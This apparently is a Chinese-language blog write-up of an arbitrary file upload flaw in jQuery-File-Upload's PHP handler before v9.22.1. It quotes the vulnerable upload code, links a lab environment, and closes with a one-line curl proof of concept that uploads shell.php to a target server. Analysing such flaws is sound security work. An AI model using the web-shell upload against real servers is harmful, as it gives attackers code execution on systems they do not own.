jQuery-File-Upload < v9.22.1 php版任意文件上传/代码执行漏洞

原创 sauren  2018-11-28 15:43  阅读 709 views 次 评论 0 条

一、影响版本

jQuery-File-Upload < v9.22.1

二、漏洞分析

php版本的jQuery-File-Upload上传接口为

POST /server/php/index.php HTTP/1.1

观察index.php发现,文件包含了另一个UploadHandler类文件

error_reporting(E_ALL | E_STRICT);
require('UploadHandler.php');
$upload_handler = new UploadHandler();

UploadHandler.php文件内主要文件上传保存流程处理函数如下:

protected function handle_file_upload($uploaded_file, $name, $size, $type, $error,
            $index = null, $content_range = null) {
        $file = new \stdClass();
        $file->name = $this->get_file_name($uploaded_file, $name, $size, $type, $error,
            $index, $content_range);
        $file->size = $this->fix_integer_overflow((int)$size);
        $file->type = $type;
        if ($this->validate($uploaded_file, $file, $error, $index)) {
            $this->handle_form_data($file, $index);
            $upload_dir = $this->get_upload_path();
            if (!is_dir($upload_dir)) {
                mkdir($upload_dir, $this->options['mkdir_mode'], true);
            }
            $file_path = $this->get_upload_path($file->name);
            $append_file = $content_range && is_file($file_path) &&
                $file->size > $this->get_file_size($file_path);
            if ($uploaded_file && is_uploaded_file($uploaded_file)) {
                // multipart/formdata uploads (POST method uploads)
                if ($append_file) {
                    file_put_contents(
                        $file_path,
                        fopen($uploaded_file, 'r'),
                        FILE_APPEND
                    );
                } else {
                    move_uploaded_file($uploaded_file, $file_path);
                }
            } else {
                // Non-multipart uploads (PUT method support)
                file_put_contents(
                    $file_path,
                    fopen('php://input', 'r'),
                    $append_file ? FILE_APPEND : 0
                );
            }
            $file_size = $this->get_file_size($file_path, $append_file);
            if ($file_size === $file->size) {
                $file->url = $this->get_download_url($file->name);
                if ($this->is_valid_image_file($file_path)) {
                    $this->handle_image_file($file_path, $file);
                }
            } else {
                $file->size = $file_size;
                if (!$content_range && $this->options['discard_aborted_uploads']) {
                    unlink($file_path);
                    $file->error = $this->get_error_message('abort');
                }
            }
            $this->set_additional_file_properties($file);
        }
        return $file;
    }

我们发现POST和PUT method的分支保存文件流程都没有检测文件后缀等逻辑,导致了任意的文件上传。

在jQuery-File-Upload官方的demo页面内,其实只需要添加任意文件上传即可。

三、实验环境

vulnspy               https://www.vsplate.com/?github=vulnspy/jQuery-File-Upload-9.22.0&autogo=1

四、象征性POC

curl -F "files=@shell.php" http://target/server/php/index.php

 

本文地址:/archives/76.html
版权声明:本文为原创文章,版权归 sauren 所有,欢迎分享本文,转载请保留出处!
高性能云服务器特惠

发表评论


表情